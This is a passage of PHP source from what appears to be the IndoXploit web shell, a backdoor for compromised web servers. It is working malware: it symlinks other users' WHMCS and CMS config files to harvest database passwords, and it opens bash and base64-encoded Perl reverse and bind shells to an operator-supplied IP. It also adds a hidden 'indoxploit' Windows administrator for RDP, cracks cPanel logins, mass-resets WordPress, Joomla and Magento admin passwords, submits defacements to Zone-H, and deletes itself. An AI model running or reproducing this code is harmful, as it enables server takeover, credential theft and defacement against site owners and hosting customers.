	{configdir => '/home/'.$usernya.'/public_html/purchase/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ACCOUNT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Account/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/account/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/USER/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/User/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/user/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clients/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clients/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/MY/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/My/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/my/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/panel/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cliente/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/support/order/submitticket.php', type => 'WHMCS' }
);
foreach (@array){
	my $confignya = $_->{configdir};
	my $typeconfig = $_->{type};
	symlink("$confignya","idx_sym/$usernya-$typeconfig.txt");
	mkdir "idx_sym/$usernya-$typeconfig.txt";
	symlink("$confignya","idx_sym/$usernya-$typeconfig.txt/0x1999.txt");
	copy("idx_sym/nemu.txt","idx_sym/$usernya-$typeconfig.txt/.htaccess") ;
	}
}
print "Content-type: text/html\n\n";
print "<head><title>Bypass 404 By 0x1999</title></head>";
print '<meta http-equiv="refresh" content="5; url=idx_sym"/>';
print '<body><center><h1>0x1999 Never Die</h1>';
print '<a href="idx_sym">Klik Disini</a>';
unlink($0);";
  1073. save("/tmp/symlink.pl", "w", base64_decode($sym['code']));
  1074. exe("perl /tmp/symlink.pl");
  1075. sleep(1);
  1076. @unlink("/tmp/symlink.pl");
  1077. @unlink("passwd.txt");
  1078. @unlink("idx_sym/pas.txt");
  1079. @unlink("idx_sym/nemu.txt");
  1080. }
  1081.  
  1082. print "<div style='background: #ffffff; width: 100%; height: 100%'>";
  1083. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_sym/' frameborder='0' scrolling='yes'></iframe>";
  1084. print "</div>";
  1085. }
  1086. elseif($toolsname === "network") {
  1087. $args = explode(" ", $args);
  1088.  
  1089. if($args[0] === "bc") {
  1090. if(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!"));
  1091. if(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!"));
  1092. if(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
  1093.  
  1094. if($args[3] === "bash") {
  1095. exe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1");
  1096. }
  1097. elseif($args[3] === "perl") {
  1098. $bc['code'] = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1099. save("/tmp/bc.pl", "w", base64_decode($bc['code']));
  1100. $bc['exec'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &");
  1101. sleep(1);
  1102. print "<pre>".$bc['exec']."\n".exe("ps aux | grep bc.pl")."</pre>";
  1103. @unlink("/tmp/bc.pl");
  1104. }
  1105. }
  1106. elseif($args[0] === "bp") {
  1107. if(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!"));
  1108. if(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
  1109.  
  1110. if($args[2] === "perl") {
  1111. $bp['code'] = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1112. save("/tmp/bp.pl", "w", base64_decode($bp['code']));
  1113. $bp['exec'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &");
  1114. sleep(1);
  1115. print "<pre>".$bp['exec']."\n".exe("ps aux | grep bp.pl")."</pre>";
  1116. @unlink("/tmp/bp.pl");
  1117. }
  1118. }
  1119. else {
  1120. print color(1, 1, "Unknown '".$args[0]."'");
  1121. }
  1122. }
  1123. elseif($toolsname === "krdp") {
  1124. $args = explode(" ", $args);
  1125.  
  1126. if(OS() !== "Windows") die(color(1, 1, "Just For Windows Server"));
  1127. if(preg_match("/indoxploit/", exe("net user"))) die(color(1, 1, "[INFO] username 'indoxploit' already exists."));
  1128.  
  1129. $add_user = exe("net user indoxploit indoxploit /add");
  1130. $add_groups1 = exe("net localgroup Administrators indoxploit /add");
  1131. $add_groups2 = exe("net localgroup Administrator indoxploit /add");
  1132. $add_groups3 = exe("net localgroup Administrateur indoxploit /add");
  1133.  
  1134. print "[ RDP ACCOUNT INFO ]<br>
  1135. ------------------------------<br>
  1136. IP: ".color(1, 2, $GLOBALS['SERVERIP'])."<br>
  1137. Username: ".color(1, 2, "indoxploit")."<br>
  1138. Password: ".color(1, 2, "indoxploit")."<br>
  1139. ------------------------------<br><br>
  1140. [ STATUS ]<br>
  1141. ------------------------------<br>
  1142. ";
  1143.  
  1144. if($add_user) {
  1145. print "[add user] -> ".color(1, 2, "SUCCESS")."<br>";
  1146. }
  1147. else {
  1148. print "[add user] -> ".color(1, 1, "FAILED")."<br>";
  1149. }
  1150.  
  1151. if($add_groups1) {
  1152. print "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."<br>";
  1153. }
  1154. elseif($add_groups2) {
  1155. print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."<br>";
  1156. }
  1157. elseif($add_groups3) {
  1158. print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."<br>";
  1159. }
  1160. else {
  1161. print "[add localgroup] -> ".color(1, 1, "FAILED")."<br>";
  1162. }
  1163.  
  1164. print "------------------------------<br>";
  1165. }
  1166. }
  1167.  
  1168. function files_and_folder() {
  1169. if(!is_dir(path())) die(color(1, 1, "Directory '".path()."' is not exists."));
  1170. if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable."));
  1171. print '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1172. <tr>
  1173. <th class="th_home"><center>Name</center></th>
  1174. <th class="th_home"><center>Type</center></th>
  1175. <th class="th_home"><center>Size</center></th>
  1176. <th class="th_home"><center>Last Modified</center></th>
  1177. <th class="th_home"><center>Owner/Group</center></th>
  1178. <th class="th_home"><center>Permission</center></th>
  1179. <th class="th_home"><center>Action</center></th>
  1180. </tr>';
  1181.  
  1182. if(function_exists('opendir')) {
  1183. if($opendir = opendir(path())) {
  1184. while(($readdir = readdir($opendir)) !== false) {
  1185. $dir[] = $readdir;
  1186. }
  1187. closedir($opendir);
  1188. }
  1189. sort($dir);
  1190. } else {
  1191. $dir = scandir(path());
  1192. }
  1193.  
  1194. foreach($dir as $folder) {
  1195. $dirinfo['path'] = path().DIRECTORY_SEPARATOR.$folder;
  1196. if(!is_dir($dirinfo['path'])) continue;
  1197. $dirinfo['type'] = filetype($dirinfo['path']);
  1198. $dirinfo['time'] = date("F d Y g:i:s", filemtime($dirinfo['path']));
  1199. $dirinfo['size'] = "-";
  1200. $dirinfo['perms'] = writeable($dirinfo['path'], perms($dirinfo['path']));
  1201. $dirinfo['link'] = ($folder === ".." ? "<a href='?dir=".dirname(path())."'>$folder</a>" : ($folder === "." ? "<a href='?dir=".path()."'>$folder</a>" : "<a href='?dir=".$dirinfo['path']."'>$folder</a>"));
  1202. $dirinfo['action']= ($folder === '.' || $folder === '..') ? "<a href='?act=newfile&dir=".path()."'>newfile</a> | <a href='?act=newfolder&dir=".path()."'>newfolder</a>" : "<a href='?act=rename_folder&dir=".$dirinfo['path']."'>rename</a> | <a href='?act=delete_folder&dir=".$dirinfo['path']."'>delete</a>";
  1203. if(function_exists('posix_getpwuid')) {
  1204. $dirinfo['owner'] = (object) @posix_getpwuid(fileowner($dirinfo['path']));
  1205. $dirinfo['owner'] = $dirinfo['owner']->name;
  1206. } else {
  1207. $dirinfo['owner'] = fileowner($dirinfo['path']);
  1208. }
  1209. if(function_exists('posix_getgrgid')) {
  1210. $dirinfo['group'] = (object) @posix_getgrgid(filegroup($dirinfo['path']));
  1211. $dirinfo['group'] = $dirinfo['group']->name;
  1212. } else {
  1213. $dirinfo['group'] = filegroup($dirinfo['path']);
  1214. }
  1215. print "<tr>";
  1216. print "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>".$dirinfo['link']."</td>";
  1217. print "<td class='td_home' style='text-align: center;'>".$dirinfo['type']."</td>";
  1218. print "<td class='td_home' style='text-align: center;'>".$dirinfo['size']."</td>";
  1219. print "<td class='td_home' style='text-align: center;'>".$dirinfo['time']."</td>";
  1220. print "<td class='td_home' style='text-align: center;'>".$dirinfo['owner'].DIRECTORY_SEPARATOR.$dirinfo['group']."</td>";
  1221. print "<td class='td_home' style='text-align: center;'>".$dirinfo['perms']."</td>";
  1222. print "<td class='td_home' style='padding-left: 15px;'>".$dirinfo['action']."</td>";
  1223. print "</tr>";
  1224. }
  1225. foreach($dir as $files) {
  1226. $fileinfo['path'] = path().DIRECTORY_SEPARATOR.$files;
  1227. if(!is_file($fileinfo['path'])) continue;
  1228. $fileinfo['type'] = filetype($fileinfo['path']);
  1229. $fileinfo['time'] = date("F d Y g:i:s", filemtime($fileinfo['path']));
  1230. $fileinfo['size'] = filesize($fileinfo['path'])/1024;
  1231. $fileinfo['size'] = round($fileinfo['size'],3);
  1232. $fileinfo['size'] = ($fileinfo['size'] > 1024) ? round($fileinfo['size']/1024,2). "MB" : $fileinfo['size']. "KB";
  1233. $fileinfo['perms']= writeable($fileinfo['path'], perms($fileinfo['path']));
  1234. if(function_exists('posix_getpwuid')) {
  1235. $fileinfo['owner'] = (object) @posix_getpwuid(fileowner($fileinfo['path']));
  1236. $fileinfo['owner'] = $fileinfo['owner']->name;
  1237. } else {
  1238. $fileinfo['owner'] = fileowner($fileinfo['path']);
  1239. }
  1240. if(function_exists('posix_getgrgid')) {
  1241. $fileinfo['group'] = (object) @posix_getgrgid(filegroup($fileinfo['path']));
  1242. $fileinfo['group'] = $fileinfo['group']->name;
  1243. } else {
  1244. $fileinfo['group'] = filegroup($fileinfo['path']);
  1245. }
  1246. print "<tr>";
  1247. print "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=".path()."&file=".$fileinfo['path']."'>$files</a></td>";
  1248. print "<td class='td_home' style='text-align: center;'>".$fileinfo['type']."</td>";
  1249. print "<td class='td_home' style='text-align: center;'>".$fileinfo['size']."</td>";
  1250. print "<td class='td_home' style='text-align: center;'>".$fileinfo['time']."</td>";
  1251. print "<td class='td_home' style='text-align: center;'>".$fileinfo['owner'].DIRECTORY_SEPARATOR.$fileinfo['group']."</td>";
  1252. print "<td class='td_home' style='text-align: center;'>".$fileinfo['perms']."</td>";
  1253. print "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=".path()."&file=".$fileinfo['path']."'>edit</a> | <a href='?act=rename&dir=".path()."&file=".$fileinfo['path']."'>rename</a> | <a href='?act=delete&dir=".path()."&file=".$fileinfo['path']."'>delete</a> | <a href='?act=download&dir=".path()."&file=".$fileinfo['path']."'>download</a></td>";
  1254. print "</tr>";
  1255. }
  1256.  
  1257. print "</table>";
  1258. print "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'>".color(1, 2, "IndoXploit")."</a></center>";
  1259. }
  1260.  
  1261.  
  1262. function action() {
  1263. tools("upload");
  1264. tools("cmd");
  1265. print "<hr style='margin-top: 15px; margin-bottom: 10px;'>";
  1266. print "<center>";
  1267. print "<ul>";
  1268. print "<li>[ <a href='?'>Home</a> ]</li>";
  1269. print "<li>[ <a href='?dir=".path()."&do=fakeroot'>Fake Root</a> ]</li>";
  1270. print "<li>[ <a href='?dir=".path()."&do=cpanel'>cPanel Crack</a> ]</li>";
  1271. print "<li>[ <a href='?dir=".path()."&do=mpc'>Mass Password Change</a> ]</li>";
  1272. print "<li>[ <a href='?dir=".path()."&do=mass'>Mass Deface/Delete</a> ]</li>";
  1273. print "<li>[ <a href='?dir=".path()."&do=lre'>Local Root Exploiter</a> ]</li>";
  1274. print "<li>[ <a href='?dir=".path()."&do=zoneh'>Zone-H</a> ]</li>";
  1275. print "</ul>";
  1276. print "</center>";
  1277. print "<hr style='margin-top: 15px; margin-bottom: 10px;'>";
  1278.  
  1279.  
  1280. if(isset($_GET['do'])) {
  1281. if($_GET['do'] === "cmd") {
  1282. if(isset($_POST['cmd'])) {
  1283. if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) {
  1284. tools("readfile", $match[1]);
  1285. }
  1286. elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) {
  1287. tools("spawn", $match[1]);
  1288. }
  1289. elseif(preg_match("/^symlink$/", $_POST['cmd'], $match)) {
  1290. tools("symlink");
  1291. }
  1292. elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) {
  1293. tools("network", $match[1]);
  1294. }
  1295. elseif(preg_match("/^krdp$/", $_POST['cmd'])) {
  1296. tools("krdp");
  1297. }
  1298. elseif(preg_match("/^jumping$/", $_POST['cmd'])) {
  1299. tools("jumping");
  1300. }
  1301. elseif(preg_match("/^idxconfig$/", $_POST['cmd'])) {
  1302. tools("idxconfig");
  1303. }
  1304. elseif(preg_match("/^logout$/", $_POST['cmd'])) {
  1305. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1306. print "<script>window.location='?';</script>";
  1307. }
  1308. elseif(preg_match("/^killme$/", $_POST['cmd'])) {
  1309. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1310. @unlink(__FILE__);
  1311. print "<script>window.location='?';</script>";
  1312. }
  1313. else {
  1314. print "<pre>".exe($_POST['cmd'])."</pre>";
  1315. }
  1316. }
  1317. else {
  1318. files_and_folder();
  1319. }
  1320. }
  1321. elseif($_GET['do'] === "zoneh") {
  1322. if(isset($_POST['submit']) AND $_GET['do'] === "zoneh") {
  1323. $nick = $_POST['nick'];
  1324. $domain = explode("\r\n", $_POST['url']);
  1325.  
  1326. print "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1327. print "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1328.  
  1329. foreach($domain as $no => $url) {
  1330. $no = ($no+1).".";
  1331. $post = curl("http://www.zone-h.org/notify/single", TRUE, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1332. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $post)) {
  1333. print "$no $url -> ".color(1, 2, "OK")."<br>";
  1334. } else {
  1335. print "$no $url -> ".color(1, 1, "ERROR")."<br>";
  1336. }
  1337. }
  1338. }
  1339. else {
  1340. print "<center><form method='post' action='?do=zoneh&dir=".path()."'>
  1341. Defacer: <br>
  1342. <input type='text' name='nick' size='50' value='IndoXploit'><br><br>
  1343. Domains: <br>
  1344. <textarea style='width: 450px; height: 150px;' name='url' placeholder='http://google.com/'></textarea><br>
  1345. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='submit' value='Submit'>
  1346. </form></center>";
  1347. }
  1348. }
  1349. elseif($_GET['do'] == 'cpanel') {
  1350. if($_POST['crack']) {
  1351. $usercp = explode("\r\n", $_POST['user_cp']);
  1352. $passcp = explode("\r\n", $_POST['pass_cp']);
  1353. $i = 0;
  1354. foreach($usercp as $ucp) {
  1355. foreach($passcp as $pcp) {
  1356. $connect = mysql_connect('localhost', $ucp, $pcp);
  1357. if($connect) {
  1358. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1359. } else {
  1360. $_SESSION[$ucp] = "1";
  1361. $_SESSION[$pcp] = "1";
  1362. if($ucp === '' || $pcp === '') {
  1363. //
  1364. } else {
  1365. $i++;
  1366. print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";
  1367. if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!");
  1368. if(!getdomainname()) print color(1, 1, "Can't get domain name");
  1369. foreach(getdomainname() as $domain) {
  1370. $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
  1371. $userdomain = $userdomain->name;
  1372. if($userdomain === $user) {
  1373. print "<a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
  1374. break;
  1375. }
  1376. }
  1377. print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain);
  1378. print ")<br>";
  1379. }
  1380. }
  1381. mysql_close($connect);
  1382. }
  1383. }
  1384. }
  1385. print ($i === 0) ? "" : "<p>".color(1, 3, "Sukses nyolong $i Cpanel by IndoXploit")."</p>";
  1386. } else {
  1387. print "<center>
  1388. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1389. <form method='post'>
  1390. USER: <br>
  1391. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1392. print implode("\n", getuser());
  1393. print "</textarea><br>
  1394. PASS: <br>
  1395. <span>Grab Password from Link Config:</span><br>
  1396. <input style='width: 425px; background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='text' name='linkpass' placeholder='http://web.com/idx_config/'>
  1397. <input style='background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='submit' name='submitlink' value='>>'>
  1398. <br>
  1399. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1400.  
  1401. if(isset($_POST['submitlink'])) {
  1402. $getpass = $_POST['linkpass'];
  1403. $get = curl($_POST['linkpass']);
  1404. preg_match_all('/<a href="(.*?).txt">/', $get, $link);
  1405. foreach($link[1] as $link_config) {
  1406. $scandir[] = "$link_config.txt";
  1407. }
  1408. }
  1409. else {
  1410. $getpass = path();
  1411. $scandir = scandir($getpass);
  1412. }
  1413.  
  1414. $password = "";
  1415.  
  1416. foreach($scandir as $files) {
  1417. $file = "$getpass/$files";
  1418. $config = file_get_contents($file);
  1419. if(preg_match("/WordPress/", $config)) {
  1420. $password .= getValue($config, "DB_PASSWORD', '", "'")."\n";
  1421. }
  1422. elseif(preg_match("/JConfig|joomla/", $config)) {
  1423. $password .= getValue($config, "password = '", "'")."\n";
  1424. }
  1425. elseif(preg_match("/Magento|Mage_Core/", $config)) {
  1426. $password .= getValue($config, "<password><![CDATA[", "]]></password>")."\n";
  1427. }
  1428. elseif(preg_match("/panggil fungsi validasi xss dan injection/", $config)) {
  1429. $password .= getValue($config, 'password = "', '"')."\n";
  1430. }
  1431. elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {
  1432. $password .= getValue($config, "'DB_PASSWORD', '", "'")."\n";
  1433. }
  1434. elseif(preg_match("/^[client]$/", $config)) {
  1435. preg_match("/password=(.*?)/", $config, $pass);
  1436. if(preg_match('/"/', $pass[1])) {
  1437. $pass[1] = str_replace('"', "", $pass[1]);
  1438. $password .= $pass[1]."\n";
  1439. }
  1440. else {
  1441. $password .= $pass[1]."\n";
  1442. }
  1443. }
  1444. elseif(preg_match("/cc_encryption_hash/", $config)) {
  1445. $password .= getValue($config, "db_password = '", "'")."\n";
  1446. }
  1447. }
  1448.  
  1449. print $password;
  1450.  
  1451. print "</textarea><br>
  1452. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='crack' value='Crack'>
  1453. </form></center>";
  1454. }
  1455. }
  1456. elseif($_GET['do'] == 'mpc') {
  1457. if($_POST['hajar']) {
  1458. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1459. print "username atau password harus lebih dari 6 karakter";
  1460. }
  1461. else {
  1462. $user_baru = $_POST['user_baru'];
  1463. $pass_baru = md5($_POST['pass_baru']);
  1464. $conf = $_POST['config_dir'];
  1465.  
  1466. if(preg_match("/^http:\/\//", $conf) OR preg_match("/^https:\/\//", $conf)) {
  1467. $get = curl($conf);
  1468. preg_match_all('/<a href="(.*?).txt">/', $get, $link);
  1469. foreach($link[1] as $link_config) {
  1470. $scan_conf[] = "$link_config.txt";
  1471. }
  1472. }
  1473. else {
  1474. $scan_conf = scandir($conf);
  1475. }
  1476.  
  1477. foreach($scan_conf as $file_conf) {
  1478. $config = file_get_contents("$conf/$file_conf");
  1479. if(preg_match("/JConfig|joomla/",$config)) {
  1480. $dbhost = getValue($config,"host = '","'");
  1481. $dbuser = getValue($config,"user = '","'");
  1482. $dbpass = getValue($config,"password = '","'");
  1483. $dbname = getValue($config,"db = '","'");
  1484. $dbprefix = getValue($config,"dbprefix = '","'");
  1485. $prefix = $dbprefix."users";
  1486. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1487. $db = mysql_select_db($dbname);
  1488. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1489. $result = mysql_fetch_array($q);
  1490. $id = $result['id'];
  1491. $site = getValue($config,"sitename = '","'");
  1492. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1493. print "Config => ".$file_conf."<br>";
  1494. print "CMS => Joomla<br>";
  1495. if($site == '') {
  1496. print "Sitename => ".color(1, 1, "Can't get domain name")."<br>";
  1497. }
  1498. else {
  1499. print "Sitename => $site<br>";
  1500. }
  1501. if(!$update OR !$conn OR !$db) {
  1502. print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1503. }
  1504. else {
  1505. print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1506. }
  1507. mysql_close($conn);
  1508. } elseif(preg_match("/WordPress/",$config)) {
  1509. $dbhost = getValue($config,"DB_HOST', '","'");
  1510. $dbuser = getValue($config,"DB_USER', '","'");
  1511. $dbpass = getValue($config,"DB_PASSWORD', '","'");
  1512. $dbname = getValue($config,"DB_NAME', '","'");
  1513. $dbprefix = getValue($config,"table_prefix = '","'");
  1514. $prefix = $dbprefix."users";
  1515. $option = $dbprefix."options";
  1516. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1517. $db = mysql_select_db($dbname);
  1518. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1519. $result = mysql_fetch_array($q);
  1520. $id = $result[ID];
  1521. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1522. $result2 = mysql_fetch_array($q2);
  1523. $target = $result2[option_value];
  1524. if($target == '') {
  1525. $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1526. }
  1527. else {
  1528. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1529. }
  1530. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1531. print "Config => ".$file_conf."<br>";
  1532. print "CMS => Wordpress<br>";
  1533. print $url_target;
  1534. if(!$update OR !$conn OR !$db) {
  1535. print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1536. }
  1537. else {
  1538. print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1539. }
  1540. mysql_close($conn);
  1541. }
  1542. elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1543. $dbhost = getValue($config,"<host><![CDATA[","]]></host>");
  1544. $dbuser = getValue($config,"<username><![CDATA[","]]></username>");
  1545. $dbpass = getValue($config,"<password><![CDATA[","]]></password>");
  1546. $dbname = getValue($config,"<dbname><![CDATA[","]]></dbname>");
  1547. $dbprefix = getValue($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1548. $prefix = $dbprefix."admin_user";
  1549. $option = $dbprefix."core_config_data";
  1550. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1551. $db = mysql_select_db($dbname);
  1552. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1553. $result = mysql_fetch_array($q);
  1554. $id = $result[user_id];
  1555. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1556. $result2 = mysql_fetch_array($q2);
